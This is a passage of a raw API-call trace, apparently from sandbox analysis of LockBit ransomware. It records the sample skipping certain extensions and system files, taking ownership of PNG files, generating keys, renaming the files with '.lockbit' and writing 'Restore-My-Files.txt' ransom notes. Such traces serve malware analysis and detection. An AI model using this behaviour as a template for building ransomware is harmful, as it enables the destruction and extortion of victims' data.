lpString2=".png") returned -1 [0082.453] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.454] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.454] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.454] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.454] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.454] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.454] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.454] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.454] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.454] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.454] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.454] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.454] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.454] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.454] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.454] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.454] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.454] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.454] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.454] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.454] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.454] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.454] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.454] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.454] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.454] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.454] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.454] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.455] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.455] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.455] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0082.455] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0082.455] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0082.455] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0082.455] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0082.455] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0082.455] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0082.455] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\") returned="" [0082.455] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png") returned=".png" [0082.455] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.455] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.455] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.455] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.455] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.455] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.455] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.455] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.455] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.455] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.455] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.455] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.455] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.455] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.455] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.456] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.456] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.456] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.456] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.456] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.456] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.456] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.456] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.456] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.456] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.456] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.456] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.456] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.456] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png.lockbit") returned 93 [0082.456] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.457] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.457] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.457] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.457] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.458] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.458] RtlFreeAnsiString (AnsiString="\\") [0082.458] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0082.458] malloc (_Size=0x200) returned 0x77d800 [0082.458] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.458] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.458] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.458] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.459] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.459] CloseHandle (hObject=0x3b8) returned 1 [0082.459] free (_Block=0x77d800) [0082.459] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0082.460] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.460] malloc (_Size=0x40068) returned 0x1fb18c0 [0082.460] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=5025) returned 1 [0082.460] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.460] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0082.460] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.461] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0082.461] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0082.463] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.463] malloc (_Size=0xd0) returned 0x1ff1e60 [0082.463] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xd0, FileInformationClass=0xa) returned 0x0 [0082.463] free (_Block=0x1ff1e60) [0082.463] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge") returned 1 [0082.463] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\Restore-My-Files.txt") returned 72 [0082.463] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.464] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd340bb, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fd340bb, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d31329f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0082.464] lstrcmpiW (lpString1=".", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0082.464] lstrcmpiW (lpString1="..", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0082.464] PathFindExtensionW (pszPath="NavigationRight_SelectionSubpicture.png") returned=".png" [0082.464] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.464] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.464] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.464] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.464] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.464] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.464] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.465] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.465] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.465] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.465] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.465] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.465] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.465] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.465] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.465] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.465] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.465] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.465] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.465] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.465] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.465] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.465] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.465] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.465] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.465] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.465] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.465] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.465] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.465] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.466] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.466] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.466] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.466] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.466] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.466] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.466] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.466] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.466] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.466] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.466] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.466] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.466] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.466] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.466] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.466] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.466] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.466] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0082.466] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0082.466] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0082.466] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0082.466] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0082.467] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0082.467] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0082.467] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\") returned="" [0082.467] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png") returned=".png" [0082.467] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.467] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.467] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.467] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.467] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.467] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.467] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.467] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.467] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.467] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.467] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.467] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.467] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.467] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.467] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.467] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.467] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.468] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.468] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.468] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.468] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.468] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.468] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.468] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.468] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.468] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.468] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.468] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.468] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png.lockbit") returned 99 [0082.468] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.469] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.469] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.469] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.469] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.470] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.470] RtlFreeAnsiString (AnsiString="\\") [0082.470] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3ac) returned 0x0 [0082.470] malloc (_Size=0x200) returned 0x77d800 [0082.470] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.470] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.470] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.470] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.470] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.471] CloseHandle (hObject=0x3ac) returned 1 [0082.471] free (_Block=0x77d800) [0082.471] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0082.471] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.471] malloc (_Size=0x40068) returned 0x1ff1e60 [0082.472] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3118) returned 1 [0082.472] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.473] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0082.473] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.473] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.473] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0082.473] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.478] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.478] malloc (_Size=0xdc) returned 0x77d800 [0082.478] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xdc, FileInformationClass=0xa) returned 0x0 [0082.478] free (_Block=0x77d800) [0082.478] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge") returned 1 [0082.478] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\Restore-My-Files.txt") returned 72 [0082.479] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.479] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd0df5e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fd0df5e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d31329f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0082.479] lstrcmpiW (lpString1=".", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0082.479] lstrcmpiW (lpString1="..", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0082.479] PathFindExtensionW (pszPath="NavigationUp_ButtonGraphic.png") returned=".png" [0082.479] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.479] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.479] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.479] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.479] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.479] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.479] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.479] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.479] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.479] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.479] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.479] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.479] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.479] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.480] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.480] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.480] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.480] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.480] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.480] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.480] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.480] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.480] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.480] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.480] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.480] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.480] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.480] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.480] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.480] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.480] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.480] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.480] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.480] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.480] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.480] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.481] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned 